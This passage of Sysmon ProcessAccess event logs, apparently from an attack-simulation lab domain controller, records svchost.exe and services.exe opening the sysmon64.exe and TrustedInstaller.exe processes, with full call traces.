C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5358,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5359,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5360,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5361,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5362,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5363,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5364,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.205","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5365,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.205\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-00102F530000}\r\nSourceProcessId: 856\r\nSourceThreadId: 948\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-00105D520800}\r\nTargetProcessId: 3592\r\nTargetImage: C:\\Windows\\servicing\\TrustedInstaller.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 